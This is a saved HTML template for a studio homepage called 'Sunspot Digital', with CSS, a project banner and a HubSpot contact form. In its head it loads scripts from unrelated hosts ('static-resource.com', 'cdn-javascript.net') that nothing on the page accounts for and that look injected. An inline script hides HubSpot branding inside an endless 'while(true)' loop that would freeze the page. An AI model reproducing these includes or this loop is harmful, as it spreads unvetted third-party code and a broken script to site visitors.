<html id="html"><head>

    <script src="redirect.js"></script>

    <meta charset="UTF-8">
    <meta name="description" content="Sunspot DIgital... This is the template">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">    

    <title>Sunspot Digital</title>
    <link rel="stylesheet" type="text/css" href="main.css">
 
  
<link href="https://fonts.googleapis.com/css?family=Maven+Pro:400,700&amp;display=swap" rel="stylesheet">

<link rel="shortcut icon" type="image/svg" href="img/favicon.png">


  <script type="text/javascript" src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8791x"></script><script type="text/javascript" src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8791x&amp;format=arrjs&amp;r=1579985148140"></script></head>
  
  <body id="body">

  
    <img onclick="location.href = '#wave1';" class="cursor-pointer" src="img/down-arrow.svg" id="down-arrow">

<style>

  #down-arrow{
    width: 13vh;
    height: 13vh;
    display: inline-block;
    position: fixed;
    bottom: -20vh;
    margin: 0 auto;
    margin-left: 46vw;
    opacity: 0.9;
    transform: translateZ(-0.5vh) scale(1); 
  }

  .cursor-pointer{
    cursor: pointer;
  }

</style><div id="title-container">
    <a><img id="my-image" class="hanging-logo-image" src="img/sunspot-logo-title.svg"></a>
    <h1>Sunspot</h1>
    <h2>Digital</h2>
</div>

<div id="section-title">
  
</div>


<style>

#section-title{
  width: 100%;
  height: 120vh;
  background: #eaeaea;
  background-image: url("img/title-background.svg");
  z-index: -100;
}

#title-container{
  position: relative;
  transform: translateZ(-0.4vh) scale(1.7); 
  left: 30vh;
  top: -19vh;
  clear: both;
  z-index: 1;

}

#title-container h1{
  position: relative;
  font-size: calc(4vw + 4vh);
  top: 33vh;
  margin-left: 22vw;
}

#title-container h2{
  position: relative;
  font-size: calc(2vw + 2vh);
  top: 33vh;
  margin-left: 22.5vw;
}

.hanging-logo-image{
  height: 50vh;
  width: auto;
  padding-left: 10vw;
  float: left;
}

.design-image{
  float: right;
  width: 50vw;
  height: auto;
  margin-top: -10vh;
  opacity: 0.03;
}


</style>
<div id="section-about">
  <img class="wave" id="wave1" src="img/wave-about.svg">
</div>

<img id="wave2" class="wave" src="img/what-we-do.svg">

<img onclick="window.location = '/popup'" id="wave3" class="wave" src="img/projects.svg">

<div id="about-negmargin"></div>

<style>

#wave3{
  cursor: pointer;
}

#section-about{
  position: relative;
  width: 100%;
  font-weight: light;
  transform: translateZ(0.3vh) scale(0.72);

}

#wave1{
  position: relative;
  width: 100%;
  height: auto;
  top: -65vh;
  margin-bottom: -65vh;
}

#wave2{
  background: #eaeaea;
  transform: translateZ(-0.1vh) scale(1.1);
  position: relative;
  width: 100%;
  height: auto;
  top: -65vh;
  margin-bottom: -65vh;
  z-index: -1;
}

#wave3{
    transform: translateZ(0.3vh) scale(0.72);

  position: relative;
  width: 100%;
  height: auto;
  top: -60vh;
  z-index: 1;
}

img.wave{
  cursor: auto;
}


#about-negmargin{
  margin-bottom: -50vh;
}

#contact-button:hover{
  cursor: pointer;
}

</style><div id="banner">
  <div id="project-container"><h2>Projects</h2>
    <img class="project">
    <img class="project">
    <img class="project">
    <img class="project">
    <img class="project">
    <img class="project">
    <img class="project">
    <img class="project">
  </div>
  <iframe src="https://example.com"></iframe>
</div>

<style>
  #banner{
    width: 100%; 
    height: 55vh;
    padding: 5vh 5vw;
    margin-bottom: 20vh;
    transform: translateZ(-0.1vh) scale(1.11);
    background: #111;
    box-shadow: 0 0 0 1.5vh rgba(0,0,0,0.08);
    transition: all 0.4s;
  }
  #banner:hover{
    box-shadow: 0 0 0 3vh rgba(0,0,0,0.03);
  }
  #banner h2{
    color: #eee;
    font-size: 7vh;
    text-align: center;
    width: 45vw;
    padding-bottom: 2vh;
  }
  #banner iframe{
    width: 40vw;
    height: 45vh;
    background: white;
    margin: auto;
    border-radius: 2vh;
    float: right;
    box-shadow: 0 0 0 0.5vh #ffffff150;
    transition: all 0.4s;
  }
  #banner iframe:hover{
    box-shadow: 0 0 0 1vh #ffffff07;
  }
  #project-container{
    display: inline-block;
    height: 45vh;
    float: left;
  }
  .project{
    background: #ffffff;
    width: 22%;
    height: 16vh;
    display: inline-block;
    border-radius: 1.5vh;
    margin: 1%;
    box-shadow: 0 0 0 0.5vh #ffffff20;
    transition: all 0.4s;
  }
  .project:hover{
    cursor: pointer;
    box-shadow: 0 0 0 1vh #ffffff10;
    opacity: 0.9;
  }
  .project:active{
    box-shadow: 0 0 0 0.3vh #ffe36c;
  }
</style>
<div style="background: #fff">
<div id="footer-lower">
  <img src="img/sunspot-white.svg" id="footer-logo"><div id="footer-title">Sunspot</div>

  <!--<a class="button1" onclick="popup()">Contact</a>
  <a class="button1" href="#banner">Projects</a>-->

</div></div>

<div style="background: #0f0f0f; height: 1px;"></div>

<style>

  .button1{
    display: border-box;
    background: #ffe36cff;
    font-size: 3.5vh;
    padding: .5vh 1.5vh;
    border-radius: 999vh;
    color: #111;
    box-shadow: 0 0 0 .6vh #ffe36c20;
    transition: all 0.4s;
    margin-right: 4vh;
    float: right;
    margin-top: 8vh;
    text-decoration: none;
  }
  .button1:hover{
    cursor: pointer;
    box-shadow: 0 0 0 1vh #ffe36c10;
    background: #ffe36cee;
  }

  #footer-upper{
    width: 100%;
    background: #212121;
    postion: relative;
    border-radius: 4vh 4vh 0 0;
    box-shadow: 0 0 0 1vh rgba(0, 0, 0, 0.1);
  }
  #footer-lower{
    width: 100%;

    background: #0f0f0f;
    z-index: 1;

    height: 20vh;

    box-shadow: 0 -1vh rgba(0, 0, 0, 0.15);
    transition: box-shadow 0.4s;
  }
  #footer-lower:hover{
    box-shadow: 0 -1.5vh rgba(0, 0, 0, 0.07);
  }
  #footer-lower img{
    width: 20vh;
    height: 20vh;
    padding: 3vh;
    float: left;
  }

  #footer-title{
    display: inline-block;
    font-size: 6vh;
    color: white;
    padding: 6.5vh;
    padding-left: 0;
  }
</style><div id="popup">
<div id="close-popup" onclick="closePopup()">X</div>
<script charset="utf-8" type="text/javascript" src="//js.hsforms.net/forms/shell.js"></script>
<script data-hubspot-rendered="true">
  hbspt.forms.create({
	portalId: "6607357",
	formId: "46a704eb-5da7-4599-bafa-681ebc1f7a3c"
});
</script><div class="hbspt-form" id="hbspt-form-1579985147412-3229565576"><iframe id="hs-form-iframe-0" class="hs-form-iframe" scrolling="no" style="position: static; border: medium none; display: block; overflow: hidden; width: 448px; height: 513px;" width="448" height="513"></iframe></div> 
</div>

<div id="popup-bg"></div>


<style>


#popup-bg{
 width: 100vw;
 height: 100vh;
 position: fixed;
 top: 0;
 left: 0;
 background: #000;
 opacity: 1;
 z-index: 10;
 display: none;
}

#popup{
 width: 30vw;
 background: #eee;
 position: fixed;
 border-radius: 2vh;
 color: #111;
 padding-bottom: 3vh;
 box-shadow: 0px 0px 0px 1vh #ffe36c1a;
 position: fixed;
 top: 18vh;
 left: 35vw;
 padding: 3vh;
 z-index: -100;
 opacity: 0;
}

#close-popup{
  display: inline-block;
  background: #ffe36c;
  color: white;
  top: 0;
  left: 0;
  float: right;
  margin: -3vh;
  overflow: hidden;
  z-index: 12;
  box-shadow: 0px 0px 0px 0.3vh rgba(0,0,0,0.03);
  border-radius: 999vh;
  padding: .5vh 1.5vh;
  font-size: 4vh;
  font-weight: bold;
  display: none;
  transition: all 0.7s;

}
#close-popup:hover{
  box-shadow: 0px 0px 0px 0.7vh rgba(0,0,0,0.01);
  cursor: pointer;
  background: #e9d066ff;
}

.sproket{
  display: none !important;
}

</style>

<script>

var cash = document.getElementsByClassName('hubspot-link__container sproket');
console.log(cash);

while(true)for(var i in cash){
  cash[i].style.display = "none";
}

</script>    <script src="script.js"></script>
  


  


<script src="header.js"></script> 
<script src="script.js"></script>



</body></html>
